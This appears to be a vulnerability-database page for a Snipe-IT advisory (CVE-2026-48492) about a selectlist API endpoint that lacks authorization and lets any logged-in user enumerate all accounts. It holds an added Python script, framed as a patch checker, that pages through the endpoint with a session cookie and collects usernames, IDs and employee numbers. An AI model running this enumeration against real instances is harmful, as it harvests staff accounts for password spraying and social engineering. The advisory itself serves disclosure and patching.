GHSA-F3C5-6CW8-FG57
Vulnerability from github – Published: 2026-06-23 22:11 – Updated: 2026-06-23 22:11
Summary
Snipe-IT's selectlist visibility is too permissive
Details
Impact
The GET /api/v1/{object}/selectlist API endpoint is missing an authorization check. Any user who can log into Snipe-IT, regardless of permissions, can retrieve a paginated list of all user accounts using only their web session cookie. No API token or elevated permissions are required. This exposes usernames, display names, employee numbers, and user IDs for every active account in the system if Full Multiple Companies Support (FMCS) is not enabled, and for every active account in the requesting user's own company if FMCS is enabled.
What an attacker can do with a valid login and zero permissions:
- Enumerate all active user accounts by paginating through the endpoint
- Harvest usernames for credential stuffing or password spray attacks
- Collect employee numbers and full names for social engineering
- Perform indirect email enumeration via the search parameter
- Map user IDs for use in further enumeration against other endpoints
This vulnerability is exploitable only by users who have a working login to the Snipe-IT system.
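As an added example (not part of the advisory and not Snipe-IT project code), here is the check a defender would run before and after upgrading: call the endpoint with a session cookie from a deliberately permission-less test account and see whether the server refuses it. The `users` object name, the `page` and `search` query parameters, the `items`/`pagination.more` shape of the JSON reply, and the use of 401/403 as the refusal status are assumptions not stated in the advisory; the sample responses are constructed so the pagination logic can be exercised offline.

```python
"""Checker for GHSA-f3c5-6cw8-fg57 / CVE-2026-48492: does a zero-permission
Snipe-IT web session get account data from /api/v1/users/selectlist?

Added example, not Snipe-IT project code. Assumptions not stated in the
advisory: the `users` object name, the `page`/`search` query parameters, a
reply shaped like {"items": [{"id": ..., "text": ...}],
"pagination": {"more": bool}}, and 401/403 as the refusal status.
"""
import json
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

# A page fetcher maps a page number to (HTTP status, response body).
Fetcher = Callable[[int], tuple[int, str]]


def classify(status: int, body: str) -> str:
    """Verdict for one response obtained with a zero-permission session.

    'patched'    -> the server refused the call (401/403), as the fix should.
    'vulnerable' -> 200 carrying account items, i.e. no authorization check ran.
    'unknown'    -> anything else (login redirect, empty list, non-JSON body).
    """
    if status in (401, 403):
        return "patched"
    if status != 200:
        return "unknown"
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "unknown"
    if isinstance(data, dict) and data.get("items"):
        return "vulnerable"
    return "unknown"


def parse_page(body: str) -> tuple[list[dict], bool]:
    """Return (items, more_pages) from one selectlist JSON page."""
    data = json.loads(body)
    items = [i for i in data.get("items", []) if isinstance(i, dict)]
    more = bool(data.get("pagination", {}).get("more", False))
    return items, more


def walk(fetch: Fetcher, max_pages: int = 100) -> tuple[str, list[dict]]:
    """Page through the endpoint until 'more' is false or a refusal is seen.

    Returns (verdict, collected_items). The max_pages cap keeps a server that
    always answers more=True from looping us forever.
    """
    collected: list[dict] = []
    verdict = "unknown"
    for page in range(1, max_pages + 1):
        status, body = fetch(page)
        verdict = classify(status, body)
        if verdict != "vulnerable":
            break
        items, more = parse_page(body)
        collected.extend(items)
        if not more:
            break
    return ("vulnerable" if collected else verdict), collected


def http_fetcher(base_url: str, session_cookie: str, search: str = "") -> Fetcher:
    """Fetcher against a live instance, sending only the web session cookie."""
    def fetch(page: int) -> tuple[int, str]:
        query = urllib.parse.urlencode({"page": page, "search": search})
        req = urllib.request.Request(
            f"{base_url.rstrip('/')}/api/v1/users/selectlist?{query}",
            headers={"Cookie": session_cookie, "Accept": "application/json"},
        )
        try:
            with urllib.request.urlopen(req, timeout=15) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as exc:
            return exc.code, exc.read().decode("utf-8", "replace")
    return fetch


# Constructed sample responses (not captured from a real instance).
SAMPLE_PAGE_1 = json.dumps({
    "items": [{"id": 1, "text": "Alice Example (aexample) (#1001)"},
              {"id": 2, "text": "Bob Example (bexample) (#1002)"}],
    "pagination": {"more": True, "per_page": 2},
})
SAMPLE_PAGE_2 = json.dumps({
    "items": [{"id": 3, "text": "Carol Example (cexample) (#1003)"}],
    "pagination": {"more": False, "per_page": 2},
})
SAMPLE_PATCHED = '{"message": "This action is unauthorized."}'


def fake_fetcher(pages: dict[int, tuple[int, str]]) -> Fetcher:
    """Fetcher over canned responses, for exercising walk() offline."""
    return lambda page: pages.get(page, (200, '{"items": []}'))


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # usage: checker.py https://snipe.example.org 'snipeit_session=...'
        verdict, items = walk(http_fetcher(sys.argv[1], sys.argv[2]))
    else:
        verdict, items = walk(fake_fetcher({1: (200, SAMPLE_PAGE_1), 2: (200, SAMPLE_PAGE_2)}))
    print(verdict, f"{len(items)} account(s) visible to a zero-permission session")
```

Run it with the base URL and the raw `Cookie` header value of the test account's browser session. Under the assumptions above, a patched instance refuses the first call; any 200 that carries items for a zero-permission session means the authorization check is still absent and the 8.5.1 fix has not landed.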
Patches
https://github.com/grokability/snipe-it/commit/4f943d4a7ab8e53f3d9e32770602d1118bab005f
Severity
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "snipe/snipe-it"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.5.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48492"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-23T22:11:13Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Impact\nThe GET /api/v1/{object}/selectlist API endpoint is missing an authorization check. Any user who can log into Snipe-IT - regardless of permissions - can retrieve a paginated list of all user accounts using only their web session cookie. No API token or elevated permissions are required. This exposes usernames, display names, employee numbers, and user IDs for every active account in the system if FMCS is not enabled, and within the company they belong to if FMCS is enabled.\n\n### What an attacker can do with a valid login and zero permissions:\n- Enumerate all active user accounts by paginating through the endpoint\n- Harvest usernames for credential stuffing or password spray attacks\n- Collect employee numbers and full names for social engineering\n- Perform indirect email enumeration via the search parameter\n- Map user IDs for use in further enumeration against other endpoints\n\nThis vulnerability is exploitable only by users who have a working login to the Snipe-IT system. \n\n### Patches\nhttps://github.com/grokability/snipe-it/commit/4f943d4a7ab8e53f3d9e32770602d1118bab005f",
"id": "GHSA-f3c5-6cw8-fg57",
"modified": "2026-06-23T22:11:13Z",
"published": "2026-06-23T22:11:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grokability/snipe-it/security/advisories/GHSA-f3c5-6cw8-fg57"
},
{
"type": "WEB",
"url": "https://github.com/grokability/snipe-it/commit/4f943d4a7ab8e53f3d9e32770602d1118bab005f"
},
{
"type": "PACKAGE",
"url": "https://github.com/grokability/snipe-it"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "Snipe-IT\u0027s selectlist visibility is too permissive"
}
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.